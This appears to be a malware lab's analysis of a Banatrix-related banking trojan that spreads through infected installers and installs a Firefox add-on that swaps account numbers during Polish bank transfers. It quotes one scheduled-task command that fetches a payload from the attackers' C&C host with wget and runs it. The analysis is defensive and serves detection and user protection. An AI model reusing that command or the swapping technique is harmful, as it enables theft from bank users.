Banatrix successor – swapping acct numbers with a Firefox add-on
Our laboratory recently received a sample of malware used for attacks on Polish users of electronic banking. Analysis of this malware gave us reasons to believe, that this is the software written by the authors of Banatrix (which we discussed in greater detail in our earlier posts), Slave and e-mail campaign (allegedly by Polish Post).
Step I: Extraction and addition of a sheduled task
Analysis shows that the most probable vector of attack was downloading this malware from one of the popular file exchange sites or a P2P network (a common Banatrix practice). At the beginning, the unaware user downloads an infected file in form of a program installer (e.g. Winamp, Corel PaintShop, PowerIso), drivers or cracked game (e.g. Minecraft). In most cases, in addition to performing normal activities, an installer also executes a dropper.
The dropper’s function was to unpack a popular program used to download files from the Internet (wget.exe) and to add a Scheduled Task. It is an interesting alternative for obtaining persistence without adding an entry in the appropriate registry key.
A sample content of the sheduled task rule:
cmd /R cd "C:\Documents and Settings\All Users\Application Data" & ping 18.104.22.168 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=YpXJRAmoSwKHkOamfqqM;winamp;1451925755 & start cmd /R dat.bmp
In this way, the infected machine informed the C&C server about its installer origin, when was it launched and when was the last time it downloaded an infected file. Although the idea behind this hoax is quite interesting, the execution is very poor. In every analysed sample, the C&C server address was hardcoded in the installer.
Step II: Downloading another file and extracting Firefox add-on
The only purpose of the next downloaded file was to extract an add-on to Mozilla Firefox web browser. In this case we’ve only encountered a Firefox plugin but we can’t exclude the possibility of a Chrome plugin being used as well.
The plugin is extracted to standard folder for Firefox add-ones.
XPI file name is also hardcoded. After extraction to the folder, plugin becomes visible from the browser under the name Firefox Google Search.
Step III: Plugin analysis and account number swap
Firefox add-on uses nsITraceableChannel, an interface which registers a stream listener (nsIStreamListener) into an HTTP channel and monitors all data coming through it. It is a method used by many add-ons, especially those used for blocking ads and in firebug – a popular developer tool. A small part of the plugin’s code responsible for copying data is shown in the figure below. It looks like a copy from some online tutorial.
The described add-on has two main functions:
- retrieval of account number to be substituted
- making and sending screenshots from the browser during money transfer (including the amount of money)
Below you can see a piece of code which is responsible for communication with the C&C:
‘identyfikator‘ (ID) for each infected host is calculated by using the function:
Math.floor((Math.random() * 999888999) + 1000000)
The request about the recipient account used during the money transfer is carried out immediately before transaction. In response, the browser receives an executable .js file containing not only the money mule account number but also the full list of services on which the transaction should not be completed (Polish auction sites using indirect payment by an agent) and constraints on the minimum and maximum transfer amount.
The injected code ensures that the user does not notice that the account number has been swapped by preventing any account number other than the one defined by the user from being displayed. The scam can be avoided by comparing the desired account number with the one received in the bank text message containing the single-use confirmation code (mTAN) if enabled.
Due to the fact that most of the malicious code is downloaded from the C&C server while the wire transfer is being performed, the plugin itself is not detected as malicious by any antivirus software. However, the add-on is not digitally signed by addons.mozilla.org. Such an add-on gets automatically disabled since Firefox version 43 (newest stable release) in accordance with Mozilla Foundation’s policy. Therefore, we recommend updating the browser to the newest version.
Polish authors of malicious software are still looking for new ways of stealing money from infected users while minimizing the risk of detection by antivirus engines. The example of the analyzed plugin shows that they don’t take any action in case of too small or too large transactions. Also the account number is sent only before the transaction. In this case, the cyber-criminals do not have to worry about control of any additional devices (like a smartphone) – a browser add-on is entirely sufficient.
I dropper – program installer
II dropper – dat.bmp